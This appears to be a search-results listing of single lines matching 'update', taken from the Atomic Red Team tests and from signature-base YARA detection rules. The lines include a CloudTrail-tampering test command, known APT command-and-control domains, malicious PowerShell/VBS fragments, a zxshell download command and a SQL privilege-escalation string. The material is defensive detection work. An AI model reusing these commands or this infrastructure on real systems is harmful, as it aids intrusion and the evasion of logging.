Creates a new CloudTrail trail in AWS; upon successful creation it will update, stop and delete the trail |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1562.008.md |
aws cloudtrail update-trail --name #{cloudtrail_name} --s3-bucket-name #{s3_bucket_name} --is-multi-region-trail --region #{region} |
MIT License. © 2018 Red Canary |
signature-base |
apt_apt10.yar |
$c2_897 = "update.yourtrap.com" ascii |
CC BY-NC 4.0 |
signature-base |
apt_bigbang.yar |
$x7 = "VXBkYXRlIHByb2c6IFRoZXJlIGlzIG5vIG9sZCBmaWxlIGluIHRlbXAu" fullword ascii /* base64 encoded string 'Update prog: There is no old file in temp.' */ |
CC BY-NC 4.0 |
signature-base |
apt_danti_svcmondr.yar |
$s4 = "\\update.dat" fullword ascii |
CC BY-NC 4.0 |
signature-base |
apt_derusbi.yar |
$s2 = "Update.dll" fullword ascii |
CC BY-NC 4.0 |
signature-base |
apt_dragonfly.yar |
$s1 = "\\Update\\Temp\\ufiles.txt" fullword wide |
CC BY-NC 4.0 |
signature-base |
apt_glassRAT.yar |
$s2 = "update.dll" fullword ascii |
CC BY-NC 4.0 |
signature-base |
apt_irongate.yar |
description = "Detects a PyInstaller file named update.exe as mentioned in the IronGate APT" |
CC BY-NC 4.0 |
signature-base |
apt_irontiger_trendmicro.yar |
$str2 = "(can not update server recently)!" nocase wide ascii |
CC BY-NC 4.0 |
signature-base |
apt_keyboys.yar |
/* Update March 2018 */ |
CC BY-NC 4.0 |
signature-base |
apt_khrat.yar |
$x1 = "http.open \"POST\", \"http://update.upload-dropbox[.]com/docs/tz/GetProcess.php\",False,\"\",\"\" " fullword ascii |
CC BY-NC 4.0 |
signature-base |
apt_lazarus_jun18.yar |
$s3 = "update" fullword wide /* Goodware String - occurred 254 times */ |
CC BY-NC 4.0 |
signature-base |
apt_middle_east_talosreport.yar |
$s5 = "update software online" fullword wide |
CC BY-NC 4.0 |
signature-base |
apt_nk_inkysquid.yar |
$magic1 = "'https://update.microsoft.com/driverupdate?id=" ascii wide |
CC BY-NC 4.0 |
signature-base |
apt_oilrig.yar |
$x1 = "Get-Content $env:Public\\Libraries\\update.vbs) -replace" ascii |
CC BY-NC 4.0 |
signature-base |
apt_oilrig.yar |
$x3 = "Call Extract(UpdateVbs, wss.ExpandEnvironmentStrings(\"%PUBLIC%\") & \"\\Libraries\\update.vbs\")" fullword ascii |
CC BY-NC 4.0 |
signature-base |
apt_oilrig.yar |
$x1 = "wss.Run \"powershell.exe \" & Chr(34) & \"& {(Get-Content $env:Public\\Libraries\\update.vbs) -replace '__',(Get-Random) | Set-C" ascii |
CC BY-NC 4.0 |
signature-base |
apt_oilrig.yar |
$x2 = “Call Extract(UpdateVbs, wss.ExpandEnvironmentStrings("%PUBLIC%") & "\Libraries\update.vbs")” fullword ascii |
CC BY-NC 4.0 |
signature-base |
apt_op_cloudhopper.yar |
$s2 = “rundll32.exe "%s", UnInstall /update %s” fullword wide |
CC BY-NC 4.0 |
signature-base |
apt_putterpanda.yar |
$s0 = “http://update.konamidata.com/test/zl/sophos/td/result/rz.dat?” fullword ascii /* PEStudio Blacklist: strings / / score: ‘28.01’ */ |
CC BY-NC 4.0 |
signature-base |
apt_putterpanda.yar |
$s1 = “http://update.konamidata.com/test/zl/sophos/td/index.dat?” fullword ascii /* PEStudio Blacklist: strings / / score: ‘28.01’ */ |
CC BY-NC 4.0 |
signature-base |
apt_reaver_sunorcal.yar |
$s3 = “~Update.lnk” fullword ascii |
CC BY-NC 4.0 |
signature-base |
apt_sandworm_centreon.yar |
$ = “App.Update” |
CC BY-NC 4.0 |
signature-base |
apt_sandworm_centreon.yar |
$typo3 = “Error.Can’t update app! Not enough update archive.” |
CC BY-NC 4.0 |
signature-base |
apt_sandworm_cyclops_blink.yar |
description = “Detects the code bytes used to check commands sent to module ID 0x51 and notable strings relating to the Cyclops Blink update process” |
CC BY-NC 4.0 |
signature-base |
apt_sednit_delphidownloader.yar |
Reference: https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/ |
CC BY-NC 4.0 |
signature-base |
apt_sednit_delphidownloader.yar |
reference = “https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/” |
CC BY-NC 4.0 |
signature-base |
apt_snaketurla_osx.yar |
$s2 = “$TARGET_PATH2/com.adobe.update.plist” ascii |
CC BY-NC 4.0 |
signature-base |
apt_sofacy_xtunnel_bundestag.yar |
$s6 = “.update.adobeincorp.com” fullword ascii |
CC BY-NC 4.0 |
signature-base |
apt_ta17_293A.yar |
$s1 = “-t time - use the time specified to update the access and modification times” fullword ascii |
CC BY-NC 4.0 |
signature-base |
apt_threatgroup_3390.yar |
description = “Threat Group 3390 APT Sample - HttpBrowser RAT Sample update.hancominc.com” |
CC BY-NC 4.0 |
signature-base |
apt_threatgroup_3390.yar |
$s0 = “update.hancominc.com” fullword wide |
CC BY-NC 4.0 |
signature-base |
apt_threatgroup_3390.yar |
$s5 = “binary.update-onlines.org” |
CC BY-NC 4.0 |
signature-base |
apt_threatgroup_3390.yar |
$s25 = “long.update-onlines.org” |
CC BY-NC 4.0 |
signature-base |
apt_threatgroup_3390.yar |
$s26 = “longlong.update-onlines.org” |
CC BY-NC 4.0 |
signature-base |
apt_threatgroup_3390.yar |
$s28 = “longshadow.update-onlines.org” |
CC BY-NC 4.0 |
signature-base |
apt_threatgroup_3390.yar |
$s29 = “longykcai.update-onlines.org” |
CC BY-NC 4.0 |
signature-base |
apt_threatgroup_3390.yar |
$s30 = “lostself.update-onlines.org” |
CC BY-NC 4.0 |
signature-base |
apt_threatgroup_3390.yar |
$s38 = “mtc.update-onlines.org” |
CC BY-NC 4.0 |
signature-base |
apt_threatgroup_3390.yar |
$s47 = “shadow.update-onlines.org” |
CC BY-NC 4.0 |
signature-base |
apt_threatgroup_3390.yar |
$s52 = “update-onlines.org” |
CC BY-NC 4.0 |
signature-base |
apt_threatgroup_3390.yar |
$s53 = “update.deepsoftupdate.com” |
CC BY-NC 4.0 |
signature-base |
apt_threatgroup_3390.yar |
$s54 = “update.hancominc.com” |
CC BY-NC 4.0 |
signature-base |
apt_threatgroup_3390.yar |
$s55 = “update.micr0soft.org” |
CC BY-NC 4.0 |
signature-base |
apt_threatgroup_3390.yar |
$s56 = “update.pchomeserver.com” |
CC BY-NC 4.0 |
signature-base |
apt_threatgroup_3390.yar |
$s65 = “www.trendmicro-update.org” |
CC BY-NC 4.0 |
signature-base |
apt_threatgroup_3390.yar |
$s66 = “www.update-onlines.org” |
CC BY-NC 4.0 |
signature-base |
apt_threatgroup_3390.yar |
$s68 = “ykcai.update-onlines.org” |
CC BY-NC 4.0 |
signature-base |
apt_turbo_campaign.yar |
$sc_2 = “update.microsoft.com” wide ascii |
CC BY-NC 4.0 |
signature-base |
apt_turla_mosquito.yar |
$s4 = “Microsoft Update” fullword wide |
CC BY-NC 4.0 |
signature-base |
apt_waterbear.yar |
$s1 = “Update.dll” fullword ascii |
CC BY-NC 4.0 |
signature-base |
apt_waterbear.yar |
$b2 = “Update.dll” fullword ascii |
CC BY-NC 4.0 |
signature-base |
apt_wildneutron.yar |
$s3 = “Driver Update and remove for Windows x64 or x86_32” fullword wide /* PEStudio Blacklist: strings / / score: ‘17.00’ */ |
CC BY-NC 4.0 |
signature-base |
apt_wildneutron.yar |
$s4 = “Realtek HD Audio Update and remove driver Tool” fullword wide /* PEStudio Blacklist: strings / / score: ‘16.00’ */ |
CC BY-NC 4.0 |
signature-base |
apt_winnti.yar |
description = “Detects a Winnti malware - Update.dll” |
CC BY-NC 4.0 |
signature-base |
apt_winnti.yar |
$s2 = “Update.dll” fullword ascii |
CC BY-NC 4.0 |
signature-base |
apt_zxshell.yar |
$x3 = “downfile -d c:\windows\update.exe” fullword ascii |
CC BY-NC 4.0 |
signature-base |
cn_pentestset_tools.yar |
$s1 = “update [dv_user] set usergroupid=1 where userid=2;–” fullword ascii /* PEStudio Blacklist: strings */ |
CC BY-NC 4.0 |
signature-base |
crime_bad_patch.yar |
$x8 = “ :Old - update patch and check anti-virus.. “ fullword wide |
CC BY-NC 4.0 |
signature-base |
crime_fireball.yar |
$s6 = “UPDATE OVERWRITE” fullword wide |
CC BY-NC 4.0 |
signature-base |
crime_icedid.yar |
$string6 = “update” fullword |
CC BY-NC 4.0 |
signature-base |
crime_malware_set_oct16.yar |
$s4 = “VXBkYXRlIEVSUk9S” fullword ascii /* base64 encoded string ‘Update ERROR’ */ |
CC BY-NC 4.0 |
signature-base |
crime_socgholish.yar |
description = “Detects SocGholish fake update Javascript files 22.02.2022” |
CC BY-NC 4.0 |
signature-base |
gen_cn_hacktools.yar |
$s1 = “@members.3322.net/dyndns/update?system=dyndns&hostname=” fullword ascii |
CC BY-NC 4.0 |
signature-base |
gen_cn_hacktools.yar |
$s3 = “@ddns.oray.com/ph/update?hostname=” fullword ascii |
CC BY-NC 4.0 |
signature-base |
gen_crunchrat.yar |
$s5 = “/update.php” fullword wide |
CC BY-NC 4.0 |
signature-base |
gen_malware_set_qa.yar |
description = “VT Research QA uploaded malware - file update.exe” |
CC BY-NC 4.0 |
signature-base |
gen_malware_set_qa.yar |
$x6 = “BTRESULTUpdate from URL|Update : File Downloaded , Executing new one in temp dir…|” fullword ascii |
CC BY-NC 4.0 |
signature-base |
gen_merlin_agent.yar |
$x2 = “[-]Connecting to web server at %s to update agent configuration information.” |
CC BY-NC 4.0 |
signature-base |
mal_codecov_hack.yar |
reference = “https://about.codecov.io/security-update/” |
CC BY-NC 4.0 |
signature-base |
mal_passwordstate_backdoor.yar |
reference = “https://thehackernews.com/2021/04/passwordstate-password-manager-update.html” |
CC BY-NC 4.0 |
signature-base |
spy_equation_fiveeyes.yar |
/* EquationDrug Update 11.03.2015 - http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/ */ |
CC BY-NC 4.0 |
signature-base |
spy_regin_fiveeyes.yar |
/* Update 27.11.14 */ |
CC BY-NC 4.0 |
signature-base |
thor-hacktools.yar |
We will frequently update this file with new rules rated TLP:WHITE |
CC BY-NC 4.0 |
signature-base |
thor-webshells.yar |
/* Update from hackers tool pack */ |
CC BY-NC 4.0 |
signature-base |
thor-webshells.yar |
/* PHP Webshell Update - August 2014 - deducted from https://github.com/JohnTroony/php-webshells */ |
CC BY-NC 4.0 |
signature-base |
thor-webshells.yar |
$s3 = “ExeNewRs.CommandText = "UPDATE " & tablename & " SET " & ExeNewRsValues & " WHER” |
CC BY-NC 4.0 |
signature-base |
vul_dell_bios_upd_driver.yar |
description = “Detects vulnerable DELL BIOS update driver that allows privilege escalation as reported in CVE-2021-21551 - DBUtil_2_3.Sys - note: it’s usual location is in the C:\Windows\Temp folder” |
CC BY-NC 4.0 |
signature-base |
yara_mixed_ext_vars.yar |
$str4 = “Winds Update” nocase wide ascii fullword |
CC BY-NC 4.0 |
signature-base |
yara_mixed_ext_vars.yar |
uint16(0) == 0x5a4d and filesize < 1000KB and all of them and filename == “update.exe” |
CC BY-NC 4.0 |